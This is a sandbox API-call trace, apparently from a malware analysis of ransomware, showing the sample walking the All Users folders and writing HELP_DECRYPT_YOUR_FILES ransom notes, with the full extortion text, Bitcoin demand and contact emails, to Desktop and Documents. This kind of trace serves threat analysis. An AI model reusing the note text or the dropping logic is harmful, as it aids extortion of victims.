	[0158.573] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="inetcache") returned 0x0
	[0158.573] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.573] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="nvidia") returned 0x0
	[0158.573] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.574] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="packages") returned 0x0
	[0158.574] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.574] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="cookies") returned 0x0
	[0158.574] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.574] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="programdata") returned 0x0
	[0158.574] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0158.574] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0158.575] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x780a8864, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.575] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0158.575] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x780a8864, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x780a8864, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780a8864, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0158.575] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7805c32a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7805c32a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780a8864, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0158.575] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7805c32a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7805c32a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780a8864, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0158.575] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0158.576] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0158.576] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1
	[0158.576] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1
	[0158.576] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1
	[0158.576] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0158.577] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0158.577] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="Desktop" | out: lpString1="C:\\Users\\All Users\\Desktop") returned="C:\\Users\\All Users\\Desktop"
	[0158.577] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Desktop" | out: lpString1="C:\\Users\\All Users\\Desktop") returned="C:\\Users\\All Users\\Desktop"
	[0158.577] lstrcatW (in: lpString1="C:\\Users\\All Users\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Desktop\\") returned="C:\\Users\\All Users\\Desktop\\"
	[0158.577] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\Desktop\\" | out: lpString1="C:\\Users\\All Users\\Desktop\\") returned="C:\\Users\\All Users\\Desktop\\"
	[0158.577] lstrcatW (in: lpString1="C:\\Users\\All Users\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Desktop\\*.*") returned="C:\\Users\\All Users\\Desktop\\*.*"
	[0158.577] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Desktop\\*.*" (normalized: "c:\\users\\all users\\desktop\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7805c32a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7805c32a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780a8864, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0158.578] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0158.578] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Desktop" | out: lpString1="C:\\Users\\All Users\\Desktop") returned="C:\\Users\\All Users\\Desktop"
	[0158.578] lstrcatW (in: lpString1="C:\\Users\\All Users\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Desktop\\*.*") returned="C:\\Users\\All Users\\Desktop\\*.*"
	[0158.578] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.578] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.579] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT") returned 54
	[0158.579] CreateFileW (lpFileName="C:\\Users\\All Users\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\desktop\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.579] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.580] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.583] CloseHandle (hObject=0x380) returned 1
	[0158.584] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.584] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.584] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0158.586] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.586] CreateFileW (lpFileName="C:\\Users\\All Users\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\desktop\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.587] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.588] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.588] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0158.588] CloseHandle (hObject=0x380) returned 1
	[0158.588] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.589] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.589] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.589] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML") returned 55
	[0158.589] CreateFileW (lpFileName="C:\\Users\\All Users\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\desktop\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.590] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.590] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0158.593] CloseHandle (hObject=0x380) returned 1
	[0158.594] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.594] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.595] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.595] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0158.604] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.605] CreateFileW (lpFileName="C:\\Users\\All Users\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\desktop\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.605] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.605] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.605] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0158.606] CloseHandle (hObject=0x380) returned 1
	[0158.608] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Desktop\\*.*" (normalized: "c:\\users\\all users\\desktop\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7805c32a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7805c32a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780a8864, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0158.609] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0158.609] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1
	[0158.609] lstrcmpW (lpString1="Documents", lpString2="..") returned 1
	[0158.609] lstrcmpW (lpString1="Documents", lpString2=".") returned 1
	[0158.609] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0158.609] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0158.609] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="Documents" | out: lpString1="C:\\Users\\All Users\\Documents") returned="C:\\Users\\All Users\\Documents"
	[0158.610] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Documents" | out: lpString1="C:\\Users\\All Users\\Documents") returned="C:\\Users\\All Users\\Documents"
	[0158.610] lstrcatW (in: lpString1="C:\\Users\\All Users\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Documents\\") returned="C:\\Users\\All Users\\Documents\\"
	[0158.610] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\Documents\\" | out: lpString1="C:\\Users\\All Users\\Documents\\") returned="C:\\Users\\All Users\\Documents\\"
	[0158.610] lstrcatW (in: lpString1="C:\\Users\\All Users\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Documents\\*.*") returned="C:\\Users\\All Users\\Documents\\*.*"
	[0158.610] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\*.*" (normalized: "c:\\users\\all users\\documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7805c32a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7805c32a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780a8864, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0158.610] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0158.610] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Documents" | out: lpString1="C:\\Users\\All Users\\Documents") returned="C:\\Users\\All Users\\Documents"
	[0158.611] lstrcatW (in: lpString1="C:\\Users\\All Users\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Documents\\*.*") returned="C:\\Users\\All Users\\Documents\\*.*"
	[0158.611] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.611] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.611] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT") returned 56
	[0158.611] CreateFileW (lpFileName="C:\\Users\\All Users\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.618] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.618] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.622] CloseHandle (hObject=0x380) returned 1
	[0158.622] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.623] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0158.624] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.625] CreateFileW (lpFileName="C:\\Users\\All Users\\Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.625] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.625] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.625] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0158.626] CloseHandle (hObject=0x380) returned 1
	[0158.626] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.627] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.627] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.627] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML") returned 57
	[0158.627] CreateFileW (lpFileName="C:\\Users\\All Users\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.628] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.628] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0158.631] CloseHandle (hObject=0x380) returned 1
	[0158.631] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.632] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.632] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0158.635] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
